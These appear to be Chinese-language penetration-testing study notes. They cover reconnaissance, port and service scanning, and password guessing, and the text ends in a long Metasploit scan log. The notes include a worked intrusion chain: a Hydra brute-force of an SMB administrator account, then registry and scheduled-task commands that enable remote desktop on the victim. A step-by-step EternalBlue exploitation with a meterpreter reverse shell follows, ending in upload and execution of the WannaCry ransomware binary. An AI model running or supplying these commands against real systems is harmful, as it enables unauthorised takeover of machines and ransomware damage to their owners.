情报搜集技术

情报搜集技术

  • 外围信息搜索

    • 通过DNS和IP地址挖掘目标网络信息

      • nslookup根据域名查询IP

        • nslookup
        • DNS记录类型
          • A 记录 - 把一个域名解析为一个IPv4地址
          • AAAA记录 - 把一个域名解析为IPv6地址
          • PTR - 把一个IP地址解析成域名
          • CNAME - 把一个域名解析成另一个域名
      • whois域名注册信息查询 (中国-新网,阿里云)

        • 域名
        • 域名持有人
        • 域名持有人电话
        • 域名持有人邮箱
        • DNS服务器所属
      • IP2Location地理位置查询 - wwwmaxmind.com 通过IP地址查询服务器经纬度

        image-20230923154530843

      • 使用设备搜索引擎直接搜索目标信息

    • 通过搜索引擎进行信息搜集

      • Google Hacking技术
        • 在百度或google搜索特定字段获取有价值攻击点
        • inurl: - 搜索URL中包含某些字符的页面
        • filetype: - 搜索指定的文件类型
        • intext: - 搜索网页内容中包含某些字符的页面
      • 搜索网站的目录结构 - 对开放目录权限的web站点进行搜索来获取关键参数
        • .bak文件:脚本备份文件
        • .txt/.sql文件:网站的SQL脚本,透露数据库结构等信息
        • inc文件夹:包含网站配置信息,如数据库账户和密码
        • admin文件夹:后台管理目录
        • manage文件家:后台管理目录
      • 检索特定类型的文件
        • 对链接到网站上的文件进行搜索类获取关键信息 - admin.php/database.php
        • robots.txt - 网站不希望爬虫程序去爬的目录地址,一般是有价值的目录
      • 搜索网站中的E-mail地址 - 可为后续钓鱼邮件或者社工手段提供目标
      • 搜索存在的SQL注入点页面
        • 登陆页面
        • 详细内容页面 - URL中通过?来传递参数
  • 主机探测与端口扫描

    • 活跃主机扫描

      • PINIG命令
      • 扫描工具 - Zenmap/Nmap

      image-20230926122852329

      • 扫描目标地址的整个C段类
    • 操作系统识别

      • 抓取数据包判断

      • 扫描工具

    • 端口扫描与服务类型探测

      • telnet 端口号,仅用于探测TCP端口
      • 扫描工具
  • 服务扫描与查点

    • 常见网络服务扫描

      • Telnet服务扫描

        • 远程登录服务,允许网络中的用户远程以命令行方式控制本机

        • 端口TCP 23

      • SSH服务扫描

        • 更加安全的远程控制

        • 端口TCP22

      • 远程桌面

        • RDP服务

        • 端口TCP3389

      • FTP服务

        • 端口号TCP20、21
      • SMB

        • 文件共享服务,Windows端口445

        • Windows Server默认会开放整个磁盘的共享 \\ip\C$

      • WWW服务

        • HTTP 端口TCP80

        • HTTPS 端口TCP443

      • 数据库服务查点

        • MySQL: TCP 3306

        • SQLServer: TCP 1433

        • Oracle: TCP 1521

      • 开放代理探测与利用 - 隐藏真实IP地址

        • 端口8000、8080
    • 口令猜测与嗅探

      • SSH口令猜测

      • FTP口令猜测

      • 远程桌面口令猜测

      • TELNET口令猜测

      • Web后台登陆口令猜解

      • ......

      • 工具:Hydra

        hydra -l administrator -P /home/kali/Downloads/password.txt 192.168.50.210 smb 
        

        image-20230926132901772

      • 暴力破解

        • 使用穷举法来对密码进行逐个猜解

        • 使用字典来提高破解效率

      • 扫描提权步骤

        1. 通过nmap扫描目标地址段,获取目标IP地址,操作系统版本以及端口信息
        2. 使用Hydra破解Windows SMB服务的管理员账户密码
        3. 把开始3389的BAT程序通过C盘隐藏共享上传到目标主机
        4. 远程在目标主机上创建计划任务,定时执行BAT程序,使目标主机开启3389
        5. 使用远程桌面登陆目标主机,获取完全控制权
        cd/
        net use \\192.168.50.210\ipc$    //建立目标主机空连接
        net time \\192.168.50.210        //获取目标主机的系统时间
        
        REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f  //新建开启3389的bat脚本,上传到目标机器
        
        at \\192.168.50.210 09:19:00 c:\a.bat  //添加一个定时作业,自动执行3389开启命令
        

        高版本的SMB2已经修复该漏洞。

        image-20230926141338274

  • 网络漏洞扫描

    • 扫描方式

      • 黑盒扫描
      • 白盒扫描
    • 扫描对象分类

      • 全面扫描主机安全漏洞

        • AWVS
        • AppScan
        • Tenable
      • 扫描特定漏洞

        • Metasploit
          1. 打开Metasploit
          2. msf>search ms17-010 \搜索ms17-010漏洞的利用模块
          3. msf>use auxiliary/scanner/smb/smb_ms17_010 \调用ms17-010漏洞扫描模块
          4. msf>auxiliary(scanner/smb/smb_ms17_010) set threads 20
          5. msf>auxiliary(scanner/smb/smb_ms17_010) set rhosts 192.168.50.0/24
          6. msf>auxiliary(scanner/smb/smb_ms17_010) run \\开始扫描
          7. 扫描结果出来后,开始攻击
          8. msf> exploit(windows/smb/ms17_010_eternalblue) \调用永恒之蓝漏洞攻击模块
          9. msf> exploit(windows/smb/ms17_010_eternalblue) > set payload payload/windows/x64/meterpreter/reverse_tcp
          10. msf> exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.50.210 \\设置攻击目标
          11. msf> exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.50.55 \\设置反弹目标
          12. msf> exploit(windows/smb/ms17_010_eternalblue) > exploit \\发起攻击
          13. 成功进入对方系统,获得对方系统控制权
          14. rdesktop IP 登陆系统
          15. meterpreter> upload c:\ wcry.ext c:\\ \\上传勒索病毒至对方计算机
          16. meterpreter> execute -f c:\wcry.exe \\执行勒索病毒
        ┌──(kali㉿kali)-[~]
        └─$ msfconsole
        [!] The following modules could not be loaded!..|
        [!]     /opt/metasploit/apps/pro/vendor/bundle/ruby/2.7.0/gems/metasploit-framework-6.1.5/modules/auxiliary/scanner/msmail/host_id.go
        [!]     /opt/metasploit/apps/pro/vendor/bundle/ruby/2.7.0/gems/metasploit-framework-6.1.5/modules/auxiliary/scanner/msmail/onprem_enum.go
        [!]     /opt/metasploit/apps/pro/vendor/bundle/ruby/2.7.0/gems/metasploit-framework-6.1.5/modules/auxiliary/scanner/msmail/exchange_enum.go
        [!]     /opt/metasploit/apps/pro/vendor/bundle/ruby/2.7.0/gems/metasploit-framework-6.1.5/modules/auxiliary/scanner/wproxy/att_open_proxy.py
        [!] Please see /home/kali/.msf4/logs/framework.log for details.
        
             ,           ,
            /             \
           ((__---,,,---__))
              (_) O O (_)_________
                 \ _ /            |\
                  o_o \   M S F   | \
                       \   _____  |  *
                        |||   WW|||
                        |||     |||
        
        
               =[ metasploit v6.1.5-dev                           ]
        + -- --=[ 2163 exploits - 1147 auxiliary - 367 post       ]
        + -- --=[ 596 payloads - 45 encoders - 10 nops            ]
        + -- --=[ 8 evasion                                       ]
        
        Metasploit tip: Use help <command> to learn more
        about any command
        
        msf6 > search MS17-010
        
        Matching Modules
        ================
        
           #  Name                                      Disclosure Date  Rank     Check  Description
           -  ----                                      ---------------  ----     -----  -----------
           0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
           1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
           2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
           3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
           4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
        
        
        Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
        
        msf6 > use auxiliary/scanner/smb/smb_ms17_010
        msf6 auxiliary(scanner/smb/smb_ms17_010) > set threads 20
        threads => 20
        msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.50.0/24
        rhosts => 192.168.50.0/24
        msf6 auxiliary(scanner/smb/smb_ms17_010) > run
        
        [-] 192.168.50.1:445      - Host does NOT appear vulnerable.
        [-] 192.168.50.8:445      - Rex::HostUnreachable: The host (192.168.50.8:445) was unreachable.
        [-] 192.168.50.10:445     - Rex::HostUnreachable: The host (192.168.50.10:445) was unreachable.
        [-] 192.168.50.2:445      - Rex::HostUnreachable: The host (192.168.50.2:445) was unreachable.
        [-] 192.168.50.4:445      - Rex::HostUnreachable: The host (192.168.50.4:445) was unreachable.
        [-] 192.168.50.9:445      - Rex::HostUnreachable: The host (192.168.50.9:445) was unreachable.
        [-] 192.168.50.5:445      - Rex::HostUnreachable: The host (192.168.50.5:445) was unreachable.
        [-] 192.168.50.11:445     - Rex::HostUnreachable: The host (192.168.50.11:445) was unreachable.
        [-] 192.168.50.13:445     - Rex::HostUnreachable: The host (192.168.50.13:445) was unreachable.
        [-] 192.168.50.12:445     - Rex::HostUnreachable: The host (192.168.50.12:445) was unreachable.
        [-] 192.168.50.6:445      - Rex::HostUnreachable: The host (192.168.50.6:445) was unreachable.
        [-] 192.168.50.0:445      - Rex::HostUnreachable: The host (192.168.50.0:445) was unreachable.
        [-] 192.168.50.3:445      - Rex::HostUnreachable: The host (192.168.50.3:445) was unreachable.
        [-] 192.168.50.18:445     - Rex::HostUnreachable: The host (192.168.50.18:445) was unreachable.
        [-] 192.168.50.7:445      - Rex::HostUnreachable: The host (192.168.50.7:445) was unreachable.
        [-] 192.168.50.19:445     - Rex::HostUnreachable: The host (192.168.50.19:445) was unreachable.
        [-] 192.168.50.15:445     - Rex::HostUnreachable: The host (192.168.50.15:445) was unreachable.
        [-] 192.168.50.17:445     - Rex::HostUnreachable: The host (192.168.50.17:445) was unreachable.
        [-] 192.168.50.14:445     - Rex::HostUnreachable: The host (192.168.50.14:445) was unreachable.
        [-] 192.168.50.16:445     - Rex::HostUnreachable: The host (192.168.50.16:445) was unreachable.
        [-] 192.168.50.20:445     - Rex::HostUnreachable: The host (192.168.50.20:445) was unreachable.
        [-] 192.168.50.21:445     - Rex::HostUnreachable: The host (192.168.50.21:445) was unreachable.
        [-] 192.168.50.33:445     - Rex::HostUnreachable: The host (192.168.50.33:445) was unreachable.
        [-] 192.168.50.25:445     - Rex::HostUnreachable: The host (192.168.50.25:445) was unreachable.
        [-] 192.168.50.29:445     - Rex::HostUnreachable: The host (192.168.50.29:445) was unreachable.
        [-] 192.168.50.36:445     - Rex::HostUnreachable: The host (192.168.50.36:445) was unreachable.
        [-] 192.168.50.26:445     - Rex::HostUnreachable: The host (192.168.50.26:445) was unreachable.
        [-] 192.168.50.22:445     - Rex::HostUnreachable: The host (192.168.50.22:445) was unreachable.
        [-] 192.168.50.34:445     - Rex::HostUnreachable: The host (192.168.50.34:445) was unreachable.
        [-] 192.168.50.24:445     - Rex::HostUnreachable: The host (192.168.50.24:445) was unreachable.
        [-] 192.168.50.35:445     - Rex::HostUnreachable: The host (192.168.50.35:445) was unreachable.
        [-] 192.168.50.37:445     - Rex::HostUnreachable: The host (192.168.50.37:445) was unreachable.
        [-] 192.168.50.28:445     - Rex::HostUnreachable: The host (192.168.50.28:445) was unreachable.
        [-] 192.168.50.23:445     - Rex::HostUnreachable: The host (192.168.50.23:445) was unreachable.
        [-] 192.168.50.38:445     - Rex::HostUnreachable: The host (192.168.50.38:445) was unreachable.
        [-] 192.168.50.32:445     - Rex::HostUnreachable: The host (192.168.50.32:445) was unreachable.
        [-] 192.168.50.27:445     - Rex::HostUnreachable: The host (192.168.50.27:445) was unreachable.
        [-] 192.168.50.30:445     - Rex::HostUnreachable: The host (192.168.50.30:445) was unreachable.
        [-] 192.168.50.31:445     - Rex::HostUnreachable: The host (192.168.50.31:445) was unreachable.
        [*] 192.168.50.0/24:445   - Scanned  28 of 256 hosts (10% complete)
        [-] 192.168.50.39:445     - Rex::HostUnreachable: The host (192.168.50.39:445) was unreachable.
        [-] 192.168.50.40:445     - Rex::HostUnreachable: The host (192.168.50.40:445) was unreachable.
        [-] 192.168.50.41:445     - Rex::HostUnreachable: The host (192.168.50.41:445) was unreachable.
        [-] 192.168.50.51:445     - Rex::HostUnreachable: The host (192.168.50.51:445) was unreachable.
        [-] 192.168.50.54:445     - Rex::HostUnreachable: The host (192.168.50.54:445) was unreachable.
        [-] 192.168.50.48:445     - Rex::HostUnreachable: The host (192.168.50.48:445) was unreachable.
        [-] 192.168.50.47:445     - Rex::HostUnreachable: The host (192.168.50.47:445) was unreachable.
        [-] 192.168.50.52:445     - Rex::HostUnreachable: The host (192.168.50.52:445) was unreachable.
        [-] 192.168.50.59:445     - Rex::HostUnreachable: The host (192.168.50.59:445) was unreachable.
        [-] 192.168.50.42:445     - Rex::HostUnreachable: The host (192.168.50.42:445) was unreachable.
        [-] 192.168.50.56:445     - Rex::HostUnreachable: The host (192.168.50.56:445) was unreachable.
        [-] 192.168.50.49:445     - Rex::HostUnreachable: The host (192.168.50.49:445) was unreachable.
        [-] 192.168.50.58:445     - Rex::HostUnreachable: The host (192.168.50.58:445) was unreachable.
        [-] 192.168.50.53:445     - Rex::HostUnreachable: The host (192.168.50.53:445) was unreachable.
        [-] 192.168.50.57:445     - Rex::HostUnreachable: The host (192.168.50.57:445) was unreachable.
        [-] 192.168.50.43:445     - Rex::HostUnreachable: The host (192.168.50.43:445) was unreachable.
        [-] 192.168.50.46:445     - Rex::HostUnreachable: The host (192.168.50.46:445) was unreachable.
        [-] 192.168.50.55:445     - Rex::HostUnreachable: The host (192.168.50.55:445) was unreachable.
        [-] 192.168.50.44:445     - Rex::HostUnreachable: The host (192.168.50.44:445) was unreachable.
        [-] 192.168.50.50:445     - Rex::HostUnreachable: The host (192.168.50.50:445) was unreachable.
        [-] 192.168.50.45:445     - Rex::HostUnreachable: The host (192.168.50.45:445) was unreachable.
        [*] 192.168.50.0/24:445   - Scanned  55 of 256 hosts (21% complete)
        [-] 192.168.50.60:445     - Rex::HostUnreachable: The host (192.168.50.60:445) was unreachable.
        [-] 192.168.50.61:445     - Rex::HostUnreachable: The host (192.168.50.61:445) was unreachable.
        [-] 192.168.50.68:445     - Rex::HostUnreachable: The host (192.168.50.68:445) was unreachable.
        [-] 192.168.50.62:445     - Rex::HostUnreachable: The host (192.168.50.62:445) was unreachable.
        [-] 192.168.50.65:445     - Rex::HostUnreachable: The host (192.168.50.65:445) was unreachable.
        [-] 192.168.50.64:445     - Rex::HostUnreachable: The host (192.168.50.64:445) was unreachable.
        [-] 192.168.50.63:445     - Rex::HostUnreachable: The host (192.168.50.63:445) was unreachable.
        [-] 192.168.50.74:445     - Rex::HostUnreachable: The host (192.168.50.74:445) was unreachable.
        [-] 192.168.50.71:445     - Rex::HostUnreachable: The host (192.168.50.71:445) was unreachable.
        [-] 192.168.50.66:445     - Rex::HostUnreachable: The host (192.168.50.66:445) was unreachable.
        [-] 192.168.50.72:445     - Rex::HostUnreachable: The host (192.168.50.72:445) was unreachable.
        [-] 192.168.50.79:445     - Rex::HostUnreachable: The host (192.168.50.79:445) was unreachable.
        [-] 192.168.50.69:445     - Rex::HostUnreachable: The host (192.168.50.69:445) was unreachable.
        [-] 192.168.50.76:445     - Rex::HostUnreachable: The host (192.168.50.76:445) was unreachable.
        [-] 192.168.50.70:445     - Rex::HostUnreachable: The host (192.168.50.70:445) was unreachable.
        [-] 192.168.50.77:445     - Rex::HostUnreachable: The host (192.168.50.77:445) was unreachable.
        [-] 192.168.50.73:445     - Rex::HostUnreachable: The host (192.168.50.73:445) was unreachable.
        [-] 192.168.50.78:445     - Rex::HostUnreachable: The host (192.168.50.78:445) was unreachable.
        [-] 192.168.50.67:445     - Rex::HostUnreachable: The host (192.168.50.67:445) was unreachable.
        [-] 192.168.50.75:445     - Rex::HostUnreachable: The host (192.168.50.75:445) was unreachable.
        [*] 192.168.50.0/24:445   - Scanned  79 of 256 hosts (30% complete)
        [-] 192.168.50.80:445     - Rex::HostUnreachable: The host (192.168.50.80:445) was unreachable.
        [-] 192.168.50.81:445     - Rex::HostUnreachable: The host (192.168.50.81:445) was unreachable.
        [-] 192.168.50.85:445     - Rex::HostUnreachable: The host (192.168.50.85:445) was unreachable.
        [-] 192.168.50.82:445     - Rex::HostUnreachable: The host (192.168.50.82:445) was unreachable.
        [-] 192.168.50.83:445     - Rex::HostUnreachable: The host (192.168.50.83:445) was unreachable.
        [-] 192.168.50.86:445     - Rex::HostUnreachable: The host (192.168.50.86:445) was unreachable.
        [-] 192.168.50.84:445     - Rex::HostUnreachable: The host (192.168.50.84:445) was unreachable.
        [-] 192.168.50.88:445     - Rex::HostUnreachable: The host (192.168.50.88:445) was unreachable.
        [-] 192.168.50.89:445     - Rex::HostUnreachable: The host (192.168.50.89:445) was unreachable.
        [-] 192.168.50.87:445     - Rex::HostUnreachable: The host (192.168.50.87:445) was unreachable.
        [-] 192.168.50.99:445     - Rex::HostUnreachable: The host (192.168.50.99:445) was unreachable.
        [-] 192.168.50.90:445     - Rex::HostUnreachable: The host (192.168.50.90:445) was unreachable.
        [-] 192.168.50.96:445     - Rex::HostUnreachable: The host (192.168.50.96:445) was unreachable.
        [-] 192.168.50.94:445     - Rex::HostUnreachable: The host (192.168.50.94:445) was unreachable.
        [-] 192.168.50.93:445     - Rex::HostUnreachable: The host (192.168.50.93:445) was unreachable.
        [-] 192.168.50.97:445     - Rex::HostUnreachable: The host (192.168.50.97:445) was unreachable.
        [-] 192.168.50.91:445     - Rex::HostUnreachable: The host (192.168.50.91:445) was unreachable.
        [-] 192.168.50.92:445     - Rex::HostUnreachable: The host (192.168.50.92:445) was unreachable.
        [-] 192.168.50.98:445     - Rex::HostUnreachable: The host (192.168.50.98:445) was unreachable.
        [-] 192.168.50.100:445    - Rex::HostUnreachable: The host (192.168.50.100:445) was unreachable.
        [-] 192.168.50.101:445    - Rex::HostUnreachable: The host (192.168.50.101:445) was unreachable.
        [-] 192.168.50.105:445    - Rex::HostUnreachable: The host (192.168.50.105:445) was unreachable.
        [-] 192.168.50.102:445    - Rex::HostUnreachable: The host (192.168.50.102:445) was unreachable.
        [-] 192.168.50.103:445    - Rex::HostUnreachable: The host (192.168.50.103:445) was unreachable.
        [-] 192.168.50.106:445    - Rex::HostUnreachable: The host (192.168.50.106:445) was unreachable.
        [-] 192.168.50.104:445    - Rex::HostUnreachable: The host (192.168.50.104:445) was unreachable.
        [*] 192.168.50.0/24:445   - Scanned 106 of 256 hosts (41% complete)
        [-] 192.168.50.109:445    - Rex::HostUnreachable: The host (192.168.50.109:445) was unreachable.
        [-] 192.168.50.107:445    - Rex::HostUnreachable: The host (192.168.50.107:445) was unreachable.
        [-] 192.168.50.108:445    - Rex::HostUnreachable: The host (192.168.50.108:445) was unreachable.
        [-] 192.168.50.111:445    - Rex::HostUnreachable: The host (192.168.50.111:445) was unreachable.
        [-] 192.168.50.113:445    - Rex::HostUnreachable: The host (192.168.50.113:445) was unreachable.
        [-] 192.168.50.116:445    - Rex::HostUnreachable: The host (192.168.50.116:445) was unreachable.
        [-] 192.168.50.110:445    - Rex::HostUnreachable: The host (192.168.50.110:445) was unreachable.
        [-] 192.168.50.112:445    - Rex::HostUnreachable: The host (192.168.50.112:445) was unreachable.
        [-] 192.168.50.114:445    - Rex::HostUnreachable: The host (192.168.50.114:445) was unreachable.
        [-] 192.168.50.117:445    - Rex::HostUnreachable: The host (192.168.50.117:445) was unreachable.
        [-] 192.168.50.115:445    - Rex::HostUnreachable: The host (192.168.50.115:445) was unreachable.
        [-] 192.168.50.118:445    - Rex::HostUnreachable: The host (192.168.50.118:445) was unreachable.
        [-] 192.168.50.119:445    - Rex::HostUnreachable: The host (192.168.50.119:445) was unreachable.
        [-] 192.168.50.124:445    - Rex::HostUnreachable: The host (192.168.50.124:445) was unreachable.
        [-] 192.168.50.121:445    - Rex::HostUnreachable: The host (192.168.50.121:445) was unreachable.
        [-] 192.168.50.122:445    - Rex::HostUnreachable: The host (192.168.50.122:445) was unreachable.
        [-] 192.168.50.123:445    - Rex::HostUnreachable: The host (192.168.50.123:445) was unreachable.
        [-] 192.168.50.125:445    - Rex::HostUnreachable: The host (192.168.50.125:445) was unreachable.
        [-] 192.168.50.120:445    - Rex::HostUnreachable: The host (192.168.50.120:445) was unreachable.
        [-] 192.168.50.126:445    - Rex::HostUnreachable: The host (192.168.50.126:445) was unreachable.
        [-] 192.168.50.128:445    - Rex::HostUnreachable: The host (192.168.50.128:445) was unreachable.
        [-] 192.168.50.127:445    - Rex::HostUnreachable: The host (192.168.50.127:445) was unreachable.
        [-] 192.168.50.129:445    - Rex::HostUnreachable: The host (192.168.50.129:445) was unreachable.
        [-] 192.168.50.130:445    - Rex::HostUnreachable: The host (192.168.50.130:445) was unreachable.
        [-] 192.168.50.133:445    - Rex::HostUnreachable: The host (192.168.50.133:445) was unreachable.
        [-] 192.168.50.134:445    - Rex::HostUnreachable: The host (192.168.50.134:445) was unreachable.
        [-] 192.168.50.131:445    - Rex::HostUnreachable: The host (192.168.50.131:445) was unreachable.
        [-] 192.168.50.136:445    - Rex::HostUnreachable: The host (192.168.50.136:445) was unreachable.
        [-] 192.168.50.135:445    - Rex::HostUnreachable: The host (192.168.50.135:445) was unreachable.
        [-] 192.168.50.132:445    - Rex::HostUnreachable: The host (192.168.50.132:445) was unreachable.
        [-] 192.168.50.95:445     - Rex::ConnectionTimeout: The connection with (192.168.50.95:445) timed out.
        [*] 192.168.50.0/24:445   - Scanned 137 of 256 hosts (53% complete)
        [-] 192.168.50.153:445    - Rex::ConnectionRefused: The connection was refused by the remote host (192.168.50.153:445).
        [-] 192.168.50.137:445    - Rex::HostUnreachable: The host (192.168.50.137:445) was unreachable.
        [-] 192.168.50.138:445    - Rex::HostUnreachable: The host (192.168.50.138:445) was unreachable.
        [-] 192.168.50.142:445    - Rex::HostUnreachable: The host (192.168.50.142:445) was unreachable.
        [-] 192.168.50.140:445    - Rex::HostUnreachable: The host (192.168.50.140:445) was unreachable.
        [-] 192.168.50.141:445    - Rex::HostUnreachable: The host (192.168.50.141:445) was unreachable.
        [-] 192.168.50.143:445    - Rex::HostUnreachable: The host (192.168.50.143:445) was unreachable.
        [-] 192.168.50.139:445    - Rex::HostUnreachable: The host (192.168.50.139:445) was unreachable.
        [-] 192.168.50.144:445    - Rex::HostUnreachable: The host (192.168.50.144:445) was unreachable.
        [-] 192.168.50.145:445    - Rex::HostUnreachable: The host (192.168.50.145:445) was unreachable.
        [-] 192.168.50.154:445    - Rex::HostUnreachable: The host (192.168.50.154:445) was unreachable.
        [-] 192.168.50.156:445    - Rex::HostUnreachable: The host (192.168.50.156:445) was unreachable.
        [-] 192.168.50.148:445    - Rex::HostUnreachable: The host (192.168.50.148:445) was unreachable.
        [-] 192.168.50.155:445    - Rex::HostUnreachable: The host (192.168.50.155:445) was unreachable.
        [-] 192.168.50.147:445    - Rex::HostUnreachable: The host (192.168.50.147:445) was unreachable.
        [-] 192.168.50.151:445    - Rex::HostUnreachable: The host (192.168.50.151:445) was unreachable.
        [-] 192.168.50.149:445    - Rex::HostUnreachable: The host (192.168.50.149:445) was unreachable.
        [-] 192.168.50.150:445    - Rex::HostUnreachable: The host (192.168.50.150:445) was unreachable.
        [-] 192.168.50.152:445    - Rex::HostUnreachable: The host (192.168.50.152:445) was unreachable.
        [-] 192.168.50.146:445    - Rex::HostUnreachable: The host (192.168.50.146:445) was unreachable.
        [*] 192.168.50.0/24:445   - Scanned 157 of 256 hosts (61% complete)
        [-] 192.168.50.175:445    - An SMB Login Error occurred while connecting to the IPC$ tree.
        [-] 192.168.50.157:445    - Rex::HostUnreachable: The host (192.168.50.157:445) was unreachable.
        [-] 192.168.50.158:445    - Rex::HostUnreachable: The host (192.168.50.158:445) was unreachable.
        [-] 192.168.50.159:445    - Rex::HostUnreachable: The host (192.168.50.159:445) was unreachable.
        [-] 192.168.50.165:445    - Rex::HostUnreachable: The host (192.168.50.165:445) was unreachable.
        [-] 192.168.50.163:445    - Rex::HostUnreachable: The host (192.168.50.163:445) was unreachable.
        [-] 192.168.50.160:445    - Rex::HostUnreachable: The host (192.168.50.160:445) was unreachable.
        [-] 192.168.50.162:445    - Rex::HostUnreachable: The host (192.168.50.162:445) was unreachable.
        [-] 192.168.50.161:445    - Rex::HostUnreachable: The host (192.168.50.161:445) was unreachable.
        [-] 192.168.50.164:445    - Rex::HostUnreachable: The host (192.168.50.164:445) was unreachable.
        [-] 192.168.50.166:445    - Rex::HostUnreachable: The host (192.168.50.166:445) was unreachable.
        [-] 192.168.50.169:445    - Rex::HostUnreachable: The host (192.168.50.169:445) was unreachable.
        [-] 192.168.50.167:445    - Rex::HostUnreachable: The host (192.168.50.167:445) was unreachable.
        [-] 192.168.50.168:445    - Rex::HostUnreachable: The host (192.168.50.168:445) was unreachable.
        [-] 192.168.50.171:445    - Rex::HostUnreachable: The host (192.168.50.171:445) was unreachable.
        [-] 192.168.50.170:445    - Rex::HostUnreachable: The host (192.168.50.170:445) was unreachable.
        [-] 192.168.50.172:445    - Rex::HostUnreachable: The host (192.168.50.172:445) was unreachable.
        [-] 192.168.50.173:445    - Rex::HostUnreachable: The host (192.168.50.173:445) was unreachable.
        [-] 192.168.50.176:445    - Rex::HostUnreachable: The host (192.168.50.176:445) was unreachable.
        [-] 192.168.50.174:445    - Rex::HostUnreachable: The host (192.168.50.174:445) was unreachable.
        [-] 192.168.50.177:445    - Rex::HostUnreachable: The host (192.168.50.177:445) was unreachable.
        [-] 192.168.50.179:445    - Rex::HostUnreachable: The host (192.168.50.179:445) was unreachable.
        [-] 192.168.50.178:445    - Rex::HostUnreachable: The host (192.168.50.178:445) was unreachable.
        [*] 192.168.50.0/24:445   - Scanned 180 of 256 hosts (70% complete)
        [-] 192.168.50.180:445    - Rex::HostUnreachable: The host (192.168.50.180:445) was unreachable.
        [-] 192.168.50.183:445    - Rex::HostUnreachable: The host (192.168.50.183:445) was unreachable.
        [-] 192.168.50.185:445    - Rex::HostUnreachable: The host (192.168.50.185:445) was unreachable.
        [-] 192.168.50.184:445    - Rex::HostUnreachable: The host (192.168.50.184:445) was unreachable.
        [-] 192.168.50.181:445    - Rex::HostUnreachable: The host (192.168.50.181:445) was unreachable.
        [-] 192.168.50.186:445    - Rex::HostUnreachable: The host (192.168.50.186:445) was unreachable.
        [-] 192.168.50.182:445    - Rex::HostUnreachable: The host (192.168.50.182:445) was unreachable.
        [-] 192.168.50.187:445    - Rex::HostUnreachable: The host (192.168.50.187:445) was unreachable.
        [-] 192.168.50.189:445    - Rex::HostUnreachable: The host (192.168.50.189:445) was unreachable.
        [-] 192.168.50.188:445    - Rex::HostUnreachable: The host (192.168.50.188:445) was unreachable.
        [-] 192.168.50.195:445    - Rex::HostUnreachable: The host (192.168.50.195:445) was unreachable.
        [-] 192.168.50.192:445    - Rex::HostUnreachable: The host (192.168.50.192:445) was unreachable.
        [-] 192.168.50.194:445    - Rex::HostUnreachable: The host (192.168.50.194:445) was unreachable.
        [-] 192.168.50.193:445    - Rex::HostUnreachable: The host (192.168.50.193:445) was unreachable.
        [-] 192.168.50.191:445    - Rex::HostUnreachable: The host (192.168.50.191:445) was unreachable.
        [-] 192.168.50.196:445    - Rex::HostUnreachable: The host (192.168.50.196:445) was unreachable.
        [-] 192.168.50.190:445    - Rex::HostUnreachable: The host (192.168.50.190:445) was unreachable.
        [-] 192.168.50.199:445    - Rex::HostUnreachable: The host (192.168.50.199:445) was unreachable.
        [-] 192.168.50.198:445    - Rex::HostUnreachable: The host (192.168.50.198:445) was unreachable.
        [-] 192.168.50.197:445    - Rex::HostUnreachable: The host (192.168.50.197:445) was unreachable.
        [-] 192.168.50.200:445    - Rex::HostUnreachable: The host (192.168.50.200:445) was unreachable.
        [-] 192.168.50.204:445    - Rex::HostUnreachable: The host (192.168.50.204:445) was unreachable.
        [-] 192.168.50.206:445    - Rex::HostUnreachable: The host (192.168.50.206:445) was unreachable.
        [-] 192.168.50.201:445    - Rex::HostUnreachable: The host (192.168.50.201:445) was unreachable.
        [-] 192.168.50.205:445    - Rex::HostUnreachable: The host (192.168.50.205:445) was unreachable.
        [-] 192.168.50.202:445    - Rex::HostUnreachable: The host (192.168.50.202:445) was unreachable.
        [-] 192.168.50.203:445    - Rex::HostUnreachable: The host (192.168.50.203:445) was unreachable.
        [*] 192.168.50.0/24:445   - Scanned 206 of 256 hosts (80% complete)
        [-] 192.168.50.207:445    - Rex::HostUnreachable: The host (192.168.50.207:445) was unreachable.
        [-] 192.168.50.208:445    - Rex::HostUnreachable: The host (192.168.50.208:445) was unreachable.
        [-] 192.168.50.209:445    - Rex::HostUnreachable: The host (192.168.50.209:445) was unreachable.
        [-] 192.168.50.210:445    - Rex::HostUnreachable: The host (192.168.50.210:445) was unreachable.
        [-] 192.168.50.211:445    - Rex::HostUnreachable: The host (192.168.50.211:445) was unreachable.
        [-] 192.168.50.213:445    - Rex::HostUnreachable: The host (192.168.50.213:445) was unreachable.
        [-] 192.168.50.216:445    - Rex::HostUnreachable: The host (192.168.50.216:445) was unreachable.
        [-] 192.168.50.212:445    - Rex::HostUnreachable: The host (192.168.50.212:445) was unreachable.
        [-] 192.168.50.214:445    - Rex::HostUnreachable: The host (192.168.50.214:445) was unreachable.
        [-] 192.168.50.215:445    - Rex::HostUnreachable: The host (192.168.50.215:445) was unreachable.
        [-] 192.168.50.234:445    - Rex::ConnectionRefused: The connection was refused by the remote host (192.168.50.234:445).
        [-] 192.168.50.219:445    - Rex::HostUnreachable: The host (192.168.50.219:445) was unreachable.
        [-] 192.168.50.218:445    - Rex::HostUnreachable: The host (192.168.50.218:445) was unreachable.
        [-] 192.168.50.217:445    - Rex::HostUnreachable: The host (192.168.50.217:445) was unreachable.
        [-] 192.168.50.220:445    - Rex::HostUnreachable: The host (192.168.50.220:445) was unreachable.
        [-] 192.168.50.222:445    - Rex::HostUnreachable: The host (192.168.50.222:445) was unreachable.
        [-] 192.168.50.221:445    - Rex::HostUnreachable: The host (192.168.50.221:445) was unreachable.
        [-] 192.168.50.227:445    - Rex::HostUnreachable: The host (192.168.50.227:445) was unreachable.
        [-] 192.168.50.225:445    - Rex::HostUnreachable: The host (192.168.50.225:445) was unreachable.
